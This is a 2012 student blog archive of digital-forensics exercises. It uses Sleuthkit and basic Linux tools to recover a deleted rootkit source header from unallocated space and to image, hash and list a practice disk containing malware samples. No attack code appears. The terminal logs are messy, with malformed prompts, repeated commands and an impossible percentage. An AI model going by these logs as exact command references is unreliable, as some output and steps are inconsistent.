Learning Infomation Security: October 2012

Wednesday, October 31, 2012

Sleuthkit Exercise

As the size of media being examined continues go grow, it is becoming
apparent to many investigators that data reduction techniques are more
important than ever. These techniques take on several forms, including hash
analysis (removing known"good' files from a data set, for example) and
separating allocated space in an image from unallocated space, allowing them
to be searched separately with specialized tools. we will be doing the latter
in this exercise.
The Sleuthkit comes with a set of tools for handling information at the
"block" layer of the analysis model. The block layer consists of the actual file
system block that hold the information we are seeking.
They are not specific to unallocate data only, but are especially useful for
working on unallocated blocks that have been exstracted from an image.
the tools that manipulate this layer, as you would expect, start with blk and include:

blkls
blkcalc
blkstat
blkcat

We will be focusing on blkls, blkcalc and blkstat for the nexs couple of exercise.

The tool that starts us off here is blkls. This command “lists all the data
blocks”. If you were to use the “-e” option, the output would be the same as
the output of dd for that volume, since -e tells blkls to copy “every block”.
However, by default, blkls will only copy out the unallocated blocks of an
image.
This allows us to separate allocated and unallocated blocks in our file
system. We can use logical tools (find, ls, etc.) on the “live” files in a mounted
file system, and concentrate data recovery efforts on only those blocks that
may contain deleted or otherwise unallocated data. Conversely, when we do a
physical search of the output of blkls, we can be sure that artifacts found are
from unallocated content.

To illustrate what we are talking about here, we'll run the same exercise
we did in Sleuthkit Exercise #2, this time extracting the unallocated data from
our volume of interest and comparing the output from the whole volume
analysis vs. unallocated analysis. So, we'll be working on the able2.dd image
from earlier. We expect to get the same results we did in Exercise #2, but this

time by analyzing only the unallocated space, and then associating the
recovered data with its original location in the full disk image.

First we'll need to change into the directory containing our able2.dd
image. Then we check the partition table and decide which volume we'll be
examining. Recall that this is where we get our -o (offset) value from for our
Sleuthkit commands. To do this, we run the mmls command :

example file the wish to identify :

root@bt:~# mkdir ~/Rby
mkdir: cannot create directory `/root/Rby': File exists

root@bt:~# cd ~/Rby
root@bt:~/Rby# mmls able2.dd
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

Slot Start End Length Description
00: Meta 0000000000 0000000000 0000000001 Primary Table (#0)
01: ----- 0000000000 0000000056 0000000057 Unallocated
02: 00:00 0000000057 0000010259 0000010203 Linux (0x83)
03: 00:01 0000010260 0000112859 0000102600 Linux (0x83)
04: 00:02 0000112860 0000178694 0000065835 Linux Swap / Solaris x86 (0x82)
05: 00:03 0000178695 0000675449 0000496755 Linux (0x83)

As with Exercise #2, we've decided to search the unallocated space in the
second Linux partition (at offset 10260, in bold above).

We run the blkls command using the offset option (-o) which indicates
what partition's file system we are analyzing. We then redirect the output to a
new file that will contain only the unallocated blocks of that particular volume.

root@bt:~/Rby# blkls -o 10260 able2.dd > able2.blkls
root@bt:~/Rby# ls -lh
total 340M
-rw-r--r-- 1 root root 9.3M 2012-10-31 16:53 able2.blkls
-rwxrwxrwx 1 root root 330M 2012-10-23 18:38 able2.dd

In the above command, we are using blkls on the second partition (-o
10260) within the able2.dd image, and redirecting the output to a file called
able2.blkls. The file able2.blkls will contain only the unallocated blocks from
the target file system.
Now, as we did in our previous analysis of this file system (Exercise #2)
we will use grep, this time on the extracted unallocated space, our able2.blkls
file, to search for our text string of interest. Read back through Exercise #2 if
you need a refresher on these commands.

root@bt:~/Rby# grep -abi cybernetik able2.blkls
1631299: * updated by Cybernetik for linux rootkit
9317041:Cybernetik proudly presents...
9323055:Email: cybernetik@nym.alias.net
9323087:Finger: cybernetik@nym.alias.net

The grep command above now tells us that we have found the string
“cybernetik” at four different offsets in the extracted unallocated space. We
will concentrate on the first hit here. Of course these are different from the
offsets we found in Exercise #2 because we are no longer searching the entire
original dd image.
So the next obvious question is “so what?”. We found potential evidence
in our extracted unallocated space. But how does it relate to the original
image? As forensic examiners, merely finding potential evidence is not good
enough. We also need to know where it came from (physical location in the
original image), what file it belongs or (possibly) belonged to, meta data
associated with the file, and context. Finding potential evidence in a big block
of aggregate unallocated space is of little use to us if we cannot at least make
some effort at attribution in the original file system.
That's where the other block layer tools come in. We can use blkcalc to
calculate the location (by data block or fragment) in our original image. Once
we've done that, we simply use the meta data layer tools to identify and
potentially recover the original file, as we did in our previous effort.
First we need to gather a bit of data about the original file system. We
run the fsstat command to determine the size of the data blocks we are
working with.

root@bt:~/Rby# fsstat -o 10260 able2.dd
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: Ext2
Volume Name:
Volume ID: 906e777080e09488d0116064da18c0c4

Last Written at: Mon Aug 11 01:50:03 2003
Last Checked at: Tue Feb 11 12:20:09 1997

Last Mounted at: Thu Feb 13 14:33:02 1997
Unmounted Improperly
Last mounted on:

Source OS: Linux
Dynamic Structure
InCompat Features: Filetype,
Read Only Compat Features: Sparse Super,

METADATA INFORMATION
--------------------------------------------
Inode Range: 1 - 12881
Root Directory: 2
Free Inodes: 5807

CONTENT INFORMATION
--------------------------------------------
Block Range: 0 - 51299
Block Size: 1024
Reserved Blocks Before Block Groups: 1
Free Blocks: 9512

BLOCK GROUP INFORMATION
--------------------------------------------
Number of Block Groups: 7
Inodes per group: 1840
Blocks per group: 8192

Group: 0:
Inode Range: 1 - 1840
Block Range: 1 - 8192
Layout:
Super Block: 1 - 1
Group Descriptor Table: 2 - 2
Data bitmap: 3 - 3
Inode bitmap: 4 - 4
Inode Table: 5 - 234
Data Blocks: 235 - 8192
Free Inodes: 789 (42%)
Free Blocks: 4601 (56%)
Total Directories: 16

Group: 1:
Inode Range: 1841 - 3680
Block Range: 8193 - 16384
Layout:
Super Block: 8193 - 8193
Group Descriptor Table: 8194 - 8194
Data bitmap: 8195 - 8195
Inode bitmap: 8196 - 8196
Inode Table: 8197 - 8426
Data Blocks: 8427 - 16384
Free Inodes: 1542 (83%)
Free Blocks: 33 (0%)
Total Directories: 13

Group: 2:
Inode Range: 3681 - 5520
Block Range: 16385 - 24576
Layout:
Data bitmap: 16385 - 16385
Inode bitmap: 16386 - 16386
Inode Table: 16389 - 16618
Data Blocks: 16387 - 16388, 16619 - 24576
Free Inodes: 0 (0%)
Free Blocks: 1813 (22%)
Total Directories: 12

Group: 3:
Inode Range: 5521 - 7360
Block Range: 24577 - 32768
Layout:
Super Block: 24577 - 24577
Group Descriptor Table: 24578 - 24578
Data bitmap: 24579 - 24579
Inode bitmap: 24580 - 24580
Inode Table: 24581 - 24810
Data Blocks: 24811 - 32768
Free Inodes: 746 (40%)
Free Blocks: 2379 (29%)
Total Directories: 76

Group: 4:
Inode Range: 7361 - 9200
Block Range: 32769 - 40960
Layout:
Data bitmap: 32769 - 32769
Inode bitmap: 32770 - 32770
Inode Table: 32773 - 33002
Data Blocks: 32771 - 32772, 33003 - 40960
Free Inodes: 0 (0%)
Free Blocks: 0 (0%)
Total Directories: 10

Group: 5:
Inode Range: 9201 - 11040
Block Range: 40961 - 49152
Layout:
Super Block: 40961 - 40961
Group Descriptor Table: 40962 - 40962
Data bitmap: 40963 - 40963
Inode bitmap: 40964 - 40964
Inode Table: 40965 - 41194
Data Blocks: 41195 - 49152
Free Inodes: 969 (52%)
Free Blocks: 545 (6%)
Total Directories: 4

Group: 6:
Inode Range: 11041 - 12880
Block Range: 49153 - 51299
Layout:
Data bitmap: 49153 - 49153
Inode bitmap: 49154 - 49154
Inode Table: 49157 - 49386
Data Blocks: 49155 - 49156, 49387 - 51299
Free Inodes: 1761 (176100%)
Free Blocks: 141 (6%)
Total Directories: 18

In the fsstat command above, we see that the block size (in bold) is 1024.
We take the offset from our grep output on the able2.blkls image and divide
that by 1024. This tells us how many unallocated data blocks into the
unallocated image we found our string of interest. We use the echo command
to pass the math expression to the command line calculator, bc:

root@bt:~/Rby# echo "1631299/1024" | bc
1593

We now know, from the above output, that the string “cybernetik” is in
data block 1593 of our extracted unallocated file, able2.blkls.
This is where our handy blkcalc command comes in. We use blkcalc
with the -u option to specify that we want to calculate the block address from
an extracted unallocated image (from blkls output). We run the command on
the original dd image because we are calculating the orginal data block in that
image.

root@bt:~/Rby# blkcalc -o 10260 -u 1593 able2.dd
5184

The command above is running blkcalc on the file system at offset
10260 (-o 10260) in the original able2.dd, passing the data block we calculated
from the blkls image able2.blkls (-u 1593). The result is a familiar block 5184
(see Exercise #2 again). The illustration below gives a visual representation of a
simple example:

caIn the illustrated example above, the data in block #3 of the blkls image
would map to block #49 in the original file system. We would find this with the
blkcalc command as shown (this is just an illustration, and does not apply to
the current exercise):

root@bt:~/example# blkcalc -o $fs_offset -u 3 original.dd
49

So, in simple terms, we have extracted the unallocated space, found a
string of interest in a data block in the unallocated image, and then found the
corresponding data block in the original image.
If we look at the blkstat (data block statistics) output for block 5184 in
the original image, we see that it is, in fact unallocated, which makes sense,
since we found it within our extracted unallocated space (we're back to the
same results as in Exercise #2). Note that we are now running the commands
on the original dd image. We'll continue on for the sake of completeness.

root@bt:~/Rby# blkstat -o 10260 able2.dd 5184
Fragment: 5184
Not Allocated
Group: 0

Using the command blkcat we can look at the raw contents of the data
block (using xxd and less as a viewer). If we want to, we can even use blkcat to
extract the block, redirecting the contents to another file:

root@bt:~/Rby# blkcat -o 10260 able2.dd 5184 | xxd | less
0000000: 2f2a 0a20 2a09 6669 7865 722e 630a 202a /*. *.fixer.c. *
0000010: 0962 7920 4964 6566 6978 200a 202a 0969 .by Idefix . *.i
0000020: 6e73 7069 7265 6420 6f6e 2073 756d 2e63 nspired on sum.c
0000030: 2061 6e64 2053 6169 6e74 5374 6174 2032 and SaintStat 2
0000040: 2e30 0a20 2a09 7570 6461 7465 6420 6279 .0. *.updated by
0000050: 2043 7962 6572 6e65 7469 6b20 666f 7220 Cybernetik for

Note the size of the file resulting from the blkcat output (5184.blkcat) is
1.0k (1024 bytes – the file system block size), just as expected.

root@bt:~/Rby# blkcat -o 10260 able2.dd 5184 > 5184.blkcat
root@bt:~/Rby# ls -lh
total 340M
-rw-r--r-- 1 root root 1.0K 2012-10-31 17:16 5184.blkcat
-rw-r--r-- 1 root root 9.3M 2012-10-31 16:53 able2.blkls
-rwxrwxrwx 1 root root 330M 2012-10-23 18:38 able2.dd

Note the size of the file resulting from the blkcat output (5184.blkcat) is
1.0k (1024 bytes – the file system block size), just as expected.

If we want to recover the actual file and meta data associated with the

identified data block, we use ifind to determine which meta data structure (in

this case inode since we are working on an EXT file system) holds the data in

block 5184. Then istat shows us the meta data for the inode:

root@bt:~/Rby# ifind -o 10260 -d 5184 able2.dd
10090
root@bt:~/Rby# istat -o 10260 able2.dd 10090
inode: 10090
Not Allocated
Group: 5
Generation Id: 3534950782
uid / gid: 4 / 7
mode: rrw-r--r--
size: 3591
num of links: 0

Inode Times:
Accessed: Sun Aug 10 11:18:36 2003
File Modified: Thu Dec 26 04:27:43 1996
Inode Modified: Sun Aug 10 11:29:58 2003
Deleted: Sun Aug 10 11:29:58 2003

Direct Blocks:
5184 5185 5186 5187

Again, as we saw previously, the istat command, which shows us the
meta data for inode 10090, indicates that the file with this inode is Not
Allocated, and its first direct block is 5184. Just as we expected.
We then use icat to recover the file. In this case, we just pipe the first few
lines out to see our string of interest, “cybernetik”.

root@bt:~/Rby# icat -o 10260 able2.dd 10090 | head -n 10
/*
* fixer.c
* by Idefix
* inspired on sum.c and SaintStat 2.0
* updated by Cybernetik for linux rootkit
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>

Tuesday, October 30, 2012

Linux and Forensic Tools

Included Forensic Tools
Linux comes with a number of simple utilities that make imaging and basic analysis of suspect disk and drives
comparatively easy, These Tools include:
*dd -command used to copy from an input file or device to an output file or device. simple bitstream imaging.
*sfdisk and fdisk -used to determine the disk structure.
*gref -search files (or multiple files)for intances of an expression or patten.
*The loop device -allows you to associate regular files with device nodes, This will then allow you to mount
a bitstream image without having to rewrite the image to a disk.
*md5sum and sha1sum -create and store an MD5 or SHA hast of a file or list of files (including devices)
*file-reads a file's header information in an attempt to ascretain its type, regardless of name or extension.
*xxd -command line hexdump tool, For viewing a file in hex mode.
Following is a a very simple series of steps to allow you to perform easy practice analysis
using the simple Linux tools mentioned above.All of the commands can be further explored with
"man command". For simplicity we are going to use a floppy with a FAT file system. Again,
this is just an introduction to the basic commands. These steps can be far powerful with some
command line tweaking.

example file the wish to identify :

Once you download the floppy image, put a blank floppy disk in your drive and create the practice

floppy with the following command(covered in detail later):

root@bt:~# dd if=practical.floppy.dd of=/dev/fd0
2880+0 records in
2880+0 records out
1474560 bytes (1.5 MB) copied, 0.337022 s, 4.4 MB/s
root@bt:~# md5sum /dev/fd0
2f4791784e2af37cf196e6a72cc79d99 /dev/fd0

One way organizing your data would be to create a directory in your "home" directory for evidence
and then a subdirectory for different cases. since we will be executing these commands as root,
the home directory is /root:
root@bt:~# mkdir ~/evid/
mkdir: cannot create directory `/root/evid/': File exists

An additonal step you might want to take is to create a special mount poin for all subject file
system analysis. this is a another way of separating common system use with evidence processing:

root@bt:~# mkdir /mnt/analysis/
mkdir: cannot create directory `/mnt/analysis/': File exists

There are two simple tools available for determining the structure of a disk attached to your system.
The first,fdisk, we discussed earlier using the -l option. Replace the "x" with the letter of the drive
that corresponds to the subject drive. For example, if our subject disk is attached on the secondary IDE
channel as the master disk, it will be seen as /dev/hdc. A serial ATA (SATA) disk will be /dev/sda(or sdb,etc.)
We can get the partition information on that disk with:

root@bt:~# fdisk -l /dev/hdc
root@bt:~# fdisk -l /dev/sda
Disk /dev/sda: 500.1 GB, 500107862016 bytes
255 heads, 63 sectors/track, 60801 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0xe23b2a65

Device Boot Start End Blocks Id System
/dev/sda3 1 10707 86003946 7 HPFS/NTFS
/dev/sda4 19467 60802 332018689 f W95 Ext'd (LBA)
/dev/sda5 19467 25841 51200984+ 7 HPFS/NTFS
/dev/sda6 25880 34293 67585423+ 7 HPFS/NTFS
/dev/sda7 34294 40004 45873576 7 HPFS/NTFS
/dev/sda8 40005 40251 1983996 82 Linux swap / Solaris
/dev/sda9 40252 60801 165067843+ 83 Linux
root@bt:~# fdisk -l /dev/sda3

Disk /dev/sda3: 88.1 GB, 88068040704 bytes
255 heads, 63 sectors/track, 10706 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x6e697373

This doesn't look like a partition table
Probably you selected the wrong device.

Device Boot Start End Blocks Id System
/dev/sda3p1 ? 120528 234814 918008208 4f QNX4.x 3rd part
Partition 1 does not end on cylinder boundary.
/dev/sda3p2 ? 119381 153271 272218546+ 73 Unknown
Partition 2 does not end on cylinder boundary.
/dev/sda3p3 ? 113202 147075 272087568 2b Unknown
Partition 3 does not end on cylinder boundary.
/dev/sda3p4 ? 177064 177067 27487 61 SpeedStor
Partition 4 does not end on cylinder boundary.
Partition table entries are not in disk order

We can redirect the output of this command to a file for later use by issuing the command as:
root@bt:~# fdisk -l /dev/sda3 > ~/evid/fdisk.disk1
A couple of things to note here: The name of the output file (fdisk.disk1) is completely arbitrary.
root@bt:~# fdisk -l /dev/sda3 > ~/evid/fdisk.disk1
root@bt:~# fdisk -l /dev/sda3 > ~/evid/fdisk.disk1

Make an image of the practice disk using basic dd. this is your standard forensic image of a suspect disk.
Change to and execute the command from within the /root/evid/ directory:

root@bt:~# cd ~/evid/
root@bt:~/evid# dd if=/dev/sda3 of=image.disk1 bs=512
^C24834529+0 records in
24834529+0 records out
12715278848 bytes (13 GB) copied, 557.744 s, 22.8 MB/s

root@bt:~/evid# fdisk -l

Disk /dev/sda: 500.1 GB, 500107862016 bytes
255 heads, 63 sectors/track, 60801 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0xe23b2a65

Device Boot Start End Blocks Id System
/dev/sda3 1 10707 86003946 7 HPFS/NTFS
/dev/sda4 19467 60802 332018689 f W95 Ext'd (LBA)
/dev/sda5 19467 25841 51200984+ 7 HPFS/NTFS
/dev/sda6 25880 34293 67585423+ 7 HPFS/NTFS
/dev/sda7 34294 40004 45873576 7 HPFS/NTFS
/dev/sda8 40005 40251 1983996 82 Linux swap / Solaris
/dev/sda9 40252 60801 165067843+ 83 Linux
Note: sector size is 2048 (not 512)

Disk /dev/sdb: 1047 MB, 1047263232 bytes
33 heads, 61 sectors/track, 254 cylinders
Units = cylinders of 2013 * 2048 = 4122624 bytes
Sector size (logical/physical): 2048 bytes / 2048 bytes
I/O size (minimum/optimal): 2048 bytes / 2048 bytes
Disk identifier: 0x6f20736b

This doesn't look like a partition table
Probably you selected the wrong device.

Device Boot Start End Blocks Id System
/dev/sdb1 ? 386556 953625 2283019262 72 Unknown
Partition 1 has different physical/logical beginnings (non-Linux?):
phys=(357, 116, 40) logical=(386555, 11, 23)
Partition 1 has different physical/logical endings:
phys=(357, 32, 45) logical=(953624, 6, 61)
Partition 1 does not end on cylinder boundary.
/dev/sdb2 ? 83801 1045563 3872056480 65 Novell Netware 386
Partition 2 has different physical/logical beginnings (non-Linux?):
phys=(288, 115, 43) logical=(83800, 2, 1)
Partition 2 has different physical/logical endings:
phys=(367, 114, 50) logical=(1045562, 23, 53)
Partition 2 does not end on cylinder boundary.
Partition 2 does not start on physical sector boundary.
/dev/sdb3 ? 928903 1890666 3872056384 79 Unknown
Partition 3 has different physical/logical beginnings (non-Linux?):
phys=(366, 32, 33) logical=(928902, 28, 32)
Partition 3 has different physical/logical endings:
phys=(357, 32, 43) logical=(1890665, 16, 36)
Partition 3 does not end on cylinder boundary.
Partition 3 does not start on physical sector boundary.
/dev/sdb4 ? 1433523 1433551 110998 d Unknown
Partition 4 has different physical/logical beginnings (non-Linux?):
phys=(372, 97, 50) logical=(1433522, 22, 25)
Partition 4 has different physical/logical endings:
phys=(0, 10, 0) logical=(1433550, 8, 13)
Partition 4 does not end on cylinder boundary.
Partition table entries are not in disk order

root@bt:~/evid# fdisk -l /dev/sdb
Note: sector size is 2048 (not 512)
Disk /dev/sdb: 1047 MB, 1047263232 bytes
33 heads, 61 sectors/track, 254 cylinders
Units = cylinders of 2013 * 2048 = 4122624 bytes
Sector size (logical/physical): 2048 bytes / 2048 bytes
I/O size (minimum/optimal): 2048 bytes / 2048 bytes
Disk identifier: 0x6f20736b
This doesn't look like a partition table
Probably you selected the wrong device.
Device Boot Start End Blocks Id System
/dev/sdb1 ? 386556 953625 2283019262 72 Unknown
Partition 1 has different physical/logical beginnings (non-Linux?):
phys=(357, 116, 40) logical=(386555, 11, 23)
Partition 1 has different physical/logical endings:
phys=(357, 32, 45) logical=(953624, 6, 61)
Partition 1 does not end on cylinder boundary.
/dev/sdb2 ? 83801 1045563 3872056480 65 Novell Netware 386
Partition 2 has different physical/logical beginnings (non-Linux?):
phys=(288, 115, 43) logical=(83800, 2, 1)
Partition 2 has different physical/logical endings:
phys=(367, 114, 50) logical=(1045562, 23, 53)
Partition 2 does not end on cylinder boundary.
Partition 2 does not start on physical sector boundary.
/dev/sdb3 ? 928903 1890666 3872056384 79 Unknown
Partition 3 has different physical/logical beginnings (non-Linux?):
phys=(366, 32, 33) logical=(928902, 28, 32)
Partition 3 has different physical/logical endings:
phys=(357, 32, 43) logical=(1890665, 16, 36)
Partition 3 does not end on cylinder boundary.
Partition 3 does not start on physical sector boundary.
/dev/sdb4 ? 1433523 1433551 110998 d Unknown
Partition 4 has different physical/logical beginnings (non-Linux?):
phys=(372, 97, 50) logical=(1433522, 22, 25)
Partition 4 has different physical/logical endings:
phys=(0, 10, 0) logical=(1433550, 8, 13)
Partition 4 does not end on cylinder boundary.
Partition table entries are not in disk order

root@bt:~/evid# dd if=/dev/sdb of=image.disk1 bs=512
2045436+0 records in
2045436+0 records out
1047263232 bytes (1.0 GB) copied, 103.362 s, 10.1 MB/s
root@bt:~/evid# md5sum /dev/sdb
044144780d449a3af7cd3a01b84c5099 /dev/sdb
root@bt:~/evid# dd if=/dev/sdb of=image.disk2 bs=512
2045436+0 records in
2045436+0 records out
1047263232 bytes (1.0 GB) copied, 103.264 s, 10.1 MB/s
root@bt:~/evid# md5sum /dev/sdb
044144780d449a3af7cd3a01b84c5099 /dev/sdb
root@bt:~/evid# md5sum image.disk2
044144780d449a3af7cd3a01b84c5099 image.disk2
root@bt:~/evid# mount -t vfat -o ro,noexec,loop image.disk2 /mnt/analysis
root@bt:~/evid# umount /mnt/analysis
root@bt:~/evid# sha1sum /dev/fd0
f5ee9cf56f23e5f5773e2a4854360404a62015cf /dev/fd0

root@bt:~/evid# sha1sum /dev/sdb
a00f3b85b348befb2e4876135b2b4449476b4e0f /dev/sdb
root@bt:~/evid# sha1sum /dev/sdb > sha.disk1
root@bt:~/evid# mount -t vfat -o ro,noexec,loop image.disk1 /mnt/analysis
root@bt:~/evid# cd /mnt/analysis/
root@bt:/mnt/analysis# find . -type f -exec sha1sum {} \; > ~/evid/sha.filelist
root@bt:/mnt/analysis# cat /root/evid/sha.filelist
86082e288fea4a0f5c5ed3c7c40b3e7947afec11 ./Docs/Benchmarks.xls
81e62f9f73633e85b91e7064655b0ed190228108 ./Docs/Computer_Build.xml
0950fb83dd03714d0c15622fa4c5efe719869e48 ./Docs/Law.doc
7a1d5170911a87a74ffff8569f85861bc2d2462d ./Docs/whyhack
63ddc7bca46f08caa51e1d64a12885e1b4c33cc9 ./Pics/C800x600.jpg
8844614b5c2f90fd9df6f8c8766109573ae1b923 ./Pics/bike2.jpg
4cf18c44023c05fad0de98ed6b669dc4645f130b ./Pics/bike3.jpg
aeb0151e67ff4dd5c00a19ee351801b5a6f11438 ./Pics/matrixs3.jpg
d252ac06995c1a6215ca5e7df7c3e02c79c24488 ./Pics/mulewheelie.gif
f6f8586eefb5f163eac2bd8ec09053d70cae000e ./Pics/Stoppie.gif
49f0405267a653bac165795ee2f8d934fb1650a9 ./ARP.EXE
9a886c8e8ad376fc53d6398cdcf8aab9e93eda27 ./FTP.EXE
4c703ee9802aa110b0673d7ae80468e6418bf74c ./loveletter.virus
7191c24f0f15cca6a5ef9a4db0aee7b40789d6c0 ./ouchy.dat
6666d9b50508360f4a2362e7fd74c91fcb68d2e8 ./snoof.gz

root@bt:/mnt/analysis# sha1sum -c /root/evid/sha.disk1
/dev/sdb: OK
root@bt:/mnt/analysis# sha1sum -c /root/evid/sha.filelist
./Docs/Benchmarks.xls: OK
./Docs/Computer_Build.xml: OK
./Docs/Law.doc: OK
./Docs/whyhack: OK
./Pics/C800x600.jpg: OK
./Pics/bike2.jpg: OK
./Pics/bike3.jpg: OK
./Pics/matrixs3.jpg: OK
./Pics/mulewheelie.gif: OK
./Pics/Stoppie.gif: OK
./ARP.EXE: OK
./FTP.EXE: OK
./loveletter.virus: OK
./ouchy.dat: OK
./snoof.gz: OK

root@bt:/mnt/analysis# ls -al
.:
total 118
drwxr-xr-x 4 root root 7168 1970-01-01 07:00 .
drwxr-xr-x 3 root root 4096 2012-10-29 19:10 ..
-rwxr-xr-x 1 root root 19536 1996-08-24 11:11 ARP.EXE
drwxr-xr-x 3 root root 512 2000-09-23 15:21 Docs
-rwxr-xr-x 1 root root 37520 1996-08-24 11:11 FTP.EXE
-r-xr-xr-x 1 root root 16161 2000-09-21 07:46 loveletter.virus
-rwxr-xr-x 1 root root 21271 2000-03-19 19:00 ouchy.dat
drwxr-xr-x 2 root root 512 2000-09-23 15:21 Pics
-rwxr-xr-x 1 root root 12384 2000-08-02 07:43 snoof.gz

root@bt:ls -alR | less
drwxr-xr-x 2 root root 512 2000-09-23 15:21 Private
-rwxr-xr-x 1 root root 3928 2000-09-21 07:45 whyhack
./Docs/Private:
total 1
drwxr-xr-x 2 root root 512 2000-09-23 15:21 .
drwxr-xr-x 3 root root 512 2000-09-23 15:21 ..
./Pics:
total 1138
drwxr-xr-x 2 root root 512 2000-09-23 15:21 .
drwxr-xr-x 4 root root 7168 1970-01-01 07:00 ..
-rwxr-xr-x 1 root root 183654 2000-09-21 07:45 bike2.jpg
-rwxr-xr-x 1 root root 187598 2000-09-21 07:45 bike3.jpg
-rwxr-xr-x 1 root root 94426 2000-03-19 19:00 C800x600.jpg
-rwxr-xr-x 1 root root 27990 2000-09-21 07:45 matrixs3.jpg
-rwxr-xr-x 1 root root 418582 2000-09-21 07:45 mulewheelie.gif
-rwxr-xr-x 1 root root 243245 2000-09-21 07:45 Stoppie.gif

root@bt:/mnt/analysis# ls -laiRtu > ~/evid/access_file.list
root@bt:/mnt/analysis# find . -type f > ~/evid/file.list.2
root@bt:/mnt/analysis# tree
.
├── ARP.EXE
├── Docs
│ ├── Benchmarks.xls
│ ├── Computer_Build.xml
│ ├── Law.doc
│ ├── Private
│ └── whyhack
├── FTP.EXE
├── loveletter.virus
├── ouchy.dat
├── Pics
│ ├── bike2.jpg
│ ├── bike3.jpg
│ ├── C800x600.jpg
│ ├── matrixs3.jpg
│ ├── mulewheelie.gif
│ └── Stoppie.gif
└── snoof.gz

3 directories, 15 files

root@bt:/mnt/analysis# grep -i jpg ~/evid/file.list.2
./Pics/C800x600.jpg
./Pics/bike2.jpg
./Pics/bike3.jpg
./Pics/matrixs3.jpg

root@bt:/mnt/analysis# find . -type f -exec file {} \; > ~/evid/filetype.list
root@bt:/mnt/analysis# cat ~/evid/filetype.list
./Docs/Benchmarks.xls: CDF V2 Document, Little Endian, Os: Windows, Version 4.10, Code page: 1252, Author: Barry J. Grundy, Last Saved By: Barry J. Grundy, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jan 8 19:53:35 1999, Security: 0
./Docs/Computer_Build.xml: gzip compressed data, from Unix
./Docs/Law.doc: CDF V2 Document, Little Endian, Os: Windows, Version 4.0, Code page: 1252, Title: The Long Arm of the Law, Author: OAG, Template: Normal.dot, Last Saved By: OAG, Revision Number: 2, Name of Creating Application: Microsoft Word 8.0, Total Editing Time: 01:00, Create Time/Date: Wed Sep 20 12:16:00 2000, Last Saved Time/Date: Wed Sep 20 12:16:00 2000, Number of Pages: 1, Number of Words: 1335, Number of Characters: 7610, Security: 0
./Docs/whyhack: ASCII English text, with very long lines, with CRLF, LF line terminators
./Pics/C800x600.jpg: JPEG image data, JFIF standard 1.02
./Pics/bike2.jpg: PC bitmap, Windows 3.x format, 300 x 204 x 24
./Pics/bike3.jpg: PC bitmap, Windows 3.x format, 317 x 197 x 24
./Pics/matrixs3.jpg: JPEG image data, JFIF standard 1.01
./Pics/mulewheelie.gif: PC bitmap, Windows 3.x format, 425 x 328 x 24
./Pics/Stoppie.gif: GIF image data, version 87a, 1024 x 693
./ARP.EXE: PE32 executable for MS Windows (console) Intel 80386 32-bit
./FTP.EXE: PE32 executable for MS Windows (console) Intel 80386 32-bit
./loveletter.virus: ASCII English text
./ouchy.dat: JPEG image data, JFIF standard 1.02
./snoof.gz: gzip compressed data, from Unix, last modified: Thu Feb 11 03:04:46 1999

root@bt:/mnt/analysis# grep image ~/evid/filetype.list
./Pics/C800x600.jpg: JPEG image data, JFIF standard 1.02
./Pics/matrixs3.jpg: JPEG image data, JFIF standard 1.01
./Pics/Stoppie.gif: GIF image data, version 87a, 1024 x 693
./ouchy.dat: JPEG image data, JFIF standard 1.02

root@bt:strings arp.exe | less
l|}
<-t8</t4
t]Ph
t2Ph '
Ph!'
@SVW
wR9U
wM9U
wH9U
SVWj
)h|I
L$ 3
L$ 3
u!Wj
L$ 3
\VSW
KERNEL32.dll
CharToOemA
USER32.dll
%u.%u.%u.%u
-%02x
%02x
%2x-%2x-%2x-%2x-%2x-%2x
SnmpExtensionQuery
SnmpExtensionInit
inetmib1.dll
%1: bad IP address: %2
%1: bad argument: %2
Interface: %1
Internet Address Physical Address Type
%1: not enough memory
other%0
invalid%0
dynamic%0
static%0
%1: Windows Sockets initialization failed: %2!d!
%1: can't load DLL: %2, error = %3!d!
%1: DLL error %3!d! in %2
The specified entry was not found
%1!-20s! %2!-20s! %3!-10s!
The interface failed to initialize: %1!u!
Unable to retrieve ARP information: %1!u!
The ARP entry addition failed: %1!u!
The ARP entry deletion failed: %1!u!
No ARP Entries Found
151J1Q1v3
7+8}8
>B>`>w>
#0a0
0d1w1
2*222L2
3r3y3
4(4.4
5$5+52595@5G5N5U5\5
6&8-8B8I8[8b8q8u8y8}8
:#:':+:/:3:7:;:?:C:G:K:O:S:W:[:_:c:g:k:o:
<e=i=m=q=u=y=}=
0f2/33373;3?3C3G3K3O3S3\7a7g7t7
7 8&8,82888>8D8J8P8V8\8b8h8D9J9P9V9

root@bt:~# umount /mnt/analysis
umount: /mnt/analysis: device is busy.
(In some cases useful info about processes that use
the device is found by lsof(8) or fuser(1))

root@bt:~/evid# nano /root/evid/searchlist.txt/hits.txt
root@bt:~/evid# ls -l
total 1024192
-rw-r--r-- 1 root root 1630 2012-10-30 21:51 access_file.list
-rw-r--r-- 1 root root 927 2012-10-30 20:28 fdisk.disk1
-rw-r--r-- 1 root root 256 2012-10-30 21:52 file.list.2
-rw-r--r-- 1 root root 1544 2012-10-30 21:57 filetype.list
-r--r--r-- 1 root root 1474560 2012-10-30 21:06 image.disk1
-rw-r--r-- 1 root root 1047263232 2012-10-30 21:15 image.disk2
drwxr-xr-x 2 root root 4096 2012-10-30 20:00 searchlist.txt
-rw-r--r-- 1 root root 51 2012-10-30 21:32 sha.disk1
-rw-r--r-- 1 root root 886 2012-10-30 21:35 sha.filelist
root@bt:~/evid# nano searchlist

root@bt:~/evid# grep -abif searchlist.txt image.disk1 > hits.txt

root@bt:~/evid# cat hits.txt

